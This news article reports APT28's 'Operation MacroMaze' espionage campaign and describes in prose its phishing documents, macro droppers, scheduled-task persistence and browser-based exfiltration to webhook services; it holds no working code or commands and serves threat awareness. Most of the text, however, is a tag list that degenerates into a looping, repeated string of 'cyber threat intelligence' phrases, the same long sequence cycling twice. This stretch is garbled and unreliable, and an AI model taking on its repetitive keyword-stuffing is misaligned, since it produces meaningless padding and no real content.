APT28 Unleashes Operation MacroMaze: A Stealthy New Cyber Assault on Europe

By Ravie Lakshmanan | February 23, 2026 | Malware / Threat Intelligence

In a chilling reminder that even the most sophisticated cyber adversaries are doubling down on simplicity, the notorious Russian state-sponsored hacking group APT28—also known as Fancy Bear—has been linked to a new espionage campaign targeting high-value organizations across Western and Central Europe. Codenamed Operation MacroMaze, this campaign is a masterclass in stealth, leveraging basic tools and legitimate services to infiltrate, persist, and exfiltrate sensitive data without raising alarms.

The Anatomy of a Silent Invasion

Between September 2025 and January 2026, APT28 orchestrated a series of spear-phishing attacks designed to lure unsuspecting victims into opening malicious documents. These documents, seemingly innocuous, contain a hidden weapon: an XML field named “INCLUDEPICTURE” that points to a webhook[.]site URL hosting a JPG image. When the document is opened, the image is fetched from the remote server, triggering an outbound HTTP request that acts as a tracking pixel. This clever mechanism allows the attackers to confirm the document has been opened and gather metadata about the recipient.

But this is just the beginning. The real danger lies in the macros embedded within these documents. LAB52, a Spanish cybersecurity firm, identified multiple variants of these macros, each evolving in sophistication to evade detection. The macros function as droppers, establishing a foothold on the compromised host and delivering additional payloads.

Evolving Evasion Techniques

The macros have undergone a fascinating evolution. Older versions relied on “headless” browser execution, a technique that runs the browser without a graphical user interface, making it harder to detect. Newer versions, however, have adopted keyboard simulation (SendKeys) to bypass security prompts, showcasing APT28’s adaptability and resourcefulness.

Once executed, the macro launches a Visual Basic Script (VBScript) that moves the infection to the next stage. This script runs a CMD file to establish persistence via scheduled tasks and launches a batch script. The batch script renders a small Base64-encoded HTML payload in Microsoft Edge in headless mode, further evading detection. It then retrieves a command from the webhook[.]site endpoint, executes it, captures its output, and exfiltrates it to another webhook[.]site instance in the form of an HTML file.

A Second Variant: Off-Screen Execution

In a twist that underscores APT28’s ingenuity, a second variant of the batch script has been discovered. This version eschews headless execution in favor of moving the browser window off-screen. It then aggressively terminates all other Edge browser processes to ensure a controlled environment. When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without any user interaction.

“This browser-based exfiltration technique leverages standard HTML functionality to transmit data while minimizing detectable artifacts on disk,” LAB52 explained. The use of widely used webhook services for both payload delivery and data exfiltration adds another layer of stealth, making it difficult for defenders to trace the attackers’ activities.

The Power of Simplicity

What makes Operation MacroMaze particularly alarming is its reliance on basic tools—batch files, tiny VBScript launchers, and simple HTML. Yet, these tools are arranged with meticulous care to maximize stealth. By moving operations into hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing critical functions to legitimate services, APT28 has crafted a campaign that is both effective and difficult to detect.

“This campaign proves that simplicity can be powerful,” LAB52 noted. “The attacker uses very basic tools but arranges them with care to maximize stealth.”

A Wake-Up Call for Cybersecurity

Operation MacroMaze is a stark reminder that even the most advanced cyber threats can be executed with relatively simple tools. It underscores the importance of vigilance, employee training, and robust cybersecurity measures. Organizations must remain vigilant against spear-phishing attacks and ensure that their systems are equipped to detect and mitigate such threats.

As APT28 continues to evolve its tactics, the cybersecurity community must stay one step ahead. Operation MacroMaze is not just a campaign; it is a wake-up call for organizations worldwide to bolster their defenses and remain ever-watchful in the face of increasingly sophisticated cyber threats.

Tags: APT28, Fancy Bear, Operation MacroMaze, Russian hackers, cyber espionage, spear-phishing, malware, threat intelligence, webhook[.]site, Microsoft Office, VBScript, cybersecurity, Europe, state-sponsored attacks, stealth malware, data exfiltration, cyber warfare, Russian APT, phishing campaign, cyber defense, digital espionage, advanced persistent threat, cyber threat, cybersecurity breach, hacking group, cyber attack, Russian cyber threat, cyber intrusion, malware campaign, cyber espionage campaign, Russian state-sponsored hacking, cyber threat actor, cyber espionage group, cyber threat intelligence, cyber security firm, cyber threat landscape, cyber threat analysis, cyber threat report, cyber threat update, cyber threat news, cyber threat alert, cyber threat warning, cyber threat mitigation, cyber threat prevention, cyber threat detection, cyber threat response, cyber threat management, cyber threat strategy, cyber threat framework, cyber threat model, cyber threat taxonomy, cyber threat classification, cyber threat categorization, cyber threat identification, cyber threat assessment, cyber threat evaluation, cyber threat monitoring, cyber threat hunting, cyber threat investigation, cyber threat forensics, cyber threat attribution, cyber threat profiling, cyber threat mapping, cyber threat visualization, cyber threat dashboard, cyber threat intelligence platform, cyber threat intelligence feed, cyber threat intelligence service, cyber threat intelligence solution, cyber threat intelligence tool, cyber threat intelligence analyst, cyber threat intelligence specialist, cyber threat intelligence expert, cyber threat intelligence consultant, cyber threat intelligence provider, cyber threat intelligence vendor, cyber threat intelligence market, cyber threat intelligence industry, cyber threat intelligence ecosystem, cyber threat intelligence community, cyber threat intelligence network, cyber threat intelligence collaboration, cyber threat intelligence sharing, cyber threat intelligence exchange, cyber threat intelligence integration, cyber threat intelligence automation, cyber threat intelligence orchestration, cyber threat intelligence correlation, cyber threat intelligence aggregation, cyber threat intelligence normalization, cyber threat intelligence enrichment, cyber threat intelligence contextualization, cyber threat intelligence interpretation, cyber threat intelligence analysis, cyber threat intelligence reporting, cyber threat intelligence dissemination, cyber threat intelligence consumption, cyber threat intelligence utilization, cyber threat intelligence application, cyber threat intelligence implementation, cyber threat intelligence deployment, cyber threat intelligence operation, cyber threat intelligence mission, cyber threat intelligence objective, cyber threat intelligence goal, cyber threat intelligence purpose, cyber threat intelligence intent, cyber threat intelligence strategy, cyber threat intelligence plan, cyber threat intelligence program, cyber threat intelligence initiative, cyber threat intelligence project, cyber threat intelligence effort, cyber threat intelligence activity, cyber threat intelligence task, cyber threat intelligence assignment, cyber threat intelligence responsibility, cyber threat intelligence role, cyber threat intelligence function, cyber threat intelligence capability, cyber threat intelligence capacity, cyber threat intelligence skill, cyber threat intelligence knowledge, cyber threat intelligence expertise, cyber threat intelligence proficiency, cyber threat intelligence competence, cyber threat intelligence mastery, cyber threat intelligence excellence, cyber threat intelligence leadership, cyber threat intelligence management, cyber threat intelligence governance, cyber threat intelligence policy, cyber threat intelligence procedure, cyber threat intelligence process, cyber threat intelligence methodology, cyber threat intelligence framework, cyber threat intelligence model, cyber threat intelligence standard, cyber threat intelligence guideline, cyber threat intelligence best practice, cyber threat intelligence principle, cyber threat intelligence concept, cyber threat intelligence idea, cyber threat intelligence innovation, cyber threat intelligence creativity, cyber threat intelligence imagination, cyber threat intelligence vision, cyber threat intelligence foresight, cyber threat intelligence insight, cyber threat intelligence understanding, cyber threat intelligence awareness, cyber threat intelligence consciousness, cyber threat intelligence perception, cyber threat intelligence recognition, cyber threat intelligence realization, cyber threat intelligence acknowledgment, cyber threat intelligence acceptance, cyber threat intelligence adoption, cyber threat intelligence integration, cyber threat intelligence assimilation, cyber threat intelligence absorption, cyber threat intelligence incorporation, cyber threat intelligence internalization, cyber threat intelligence embodiment, cyber threat intelligence manifestation, cyber threat intelligence expression, cyber threat intelligence communication, cyber threat intelligence articulation, cyber threat intelligence explanation, cyber threat intelligence description, cyber threat intelligence narration, cyber threat intelligence storytelling, cyber threat intelligence presentation, cyber threat intelligence demonstration, cyber threat intelligence exhibition, cyber threat intelligence display, cyber threat intelligence showcase, cyber threat intelligence performance, cyber threat intelligence execution, cyber threat intelligence implementation, cyber threat intelligence deployment, cyber threat intelligence operation, cyber threat intelligence mission, cyber threat intelligence objective, cyber threat intelligence goal, cyber threat intelligence purpose, cyber threat intelligence intent, cyber threat intelligence strategy, cyber threat intelligence plan, cyber threat intelligence program, cyber threat intelligence initiative, cyber threat intelligence project, cyber threat intelligence effort, cyber threat intelligence activity, cyber threat intelligence task, cyber threat intelligence assignment, cyber threat intelligence responsibility, cyber threat intelligence role, cyber threat intelligence function, cyber threat intelligence capability, cyber threat intelligence capacity, cyber threat intelligence skill, cyber threat intelligence knowledge, cyber threat intelligence expertise, cyber threat intelligence proficiency, cyber threat intelligence competence, cyber threat intelligence mastery, cyber threat intelligence excellence, cyber threat intelligence leadership, cyber threat intelligence management, cyber threat intelligence governance, cyber threat intelligence policy, cyber threat intelligence procedure, cyber threat intelligence process, cyber threat intelligence methodology, cyber threat intelligence framework, cyber threat intelligence model, cyber threat intelligence standard, cyber threat intelligence guideline, cyber threat intelligence best practice, cyber threat intelligence principle, cyber threat intelligence concept, cyber threat intelligence idea, cyber threat intelligence innovation, cyber threat intelligence creativity, cyber threat intelligence imagination, cyber threat intelligence vision, cyber threat intelligence foresight, cyber threat intelligence insight, cyber threat intelligence understanding, cyber threat intelligence awareness, cyber threat intelligence consciousness, cyber threat intelligence perception, cyber threat intelligence recognition, cyber threat intelligence realization, cyber threat intelligence acknowledgment, cyber threat intelligence acceptance, cyber threat intelligence adoption, cyber threat intelligence integration, cyber threat intelligence assimilation, cyber threat intelligence absorption, cyber threat intelligence incorporation, cyber threat intelligence internalization, cyber threat intelligence embodiment, cyber threat intelligence manifestation, cyber threat intelligence expression, cyber threat intelligence communication, cyber threat intelligence articulation, cyber threat intelligence explanation, cyber threat intelligence description, cyber threat intelligence narration, cyber threat intelligence storytelling, cyber threat intelligence presentation, cyber threat intelligence demonstration, cyber threat intelligence exhibition, cyber threat intelligence display, cyber threat intelligence showcase, cyber threat intelligence performance, cyber threat intelligence execution.

,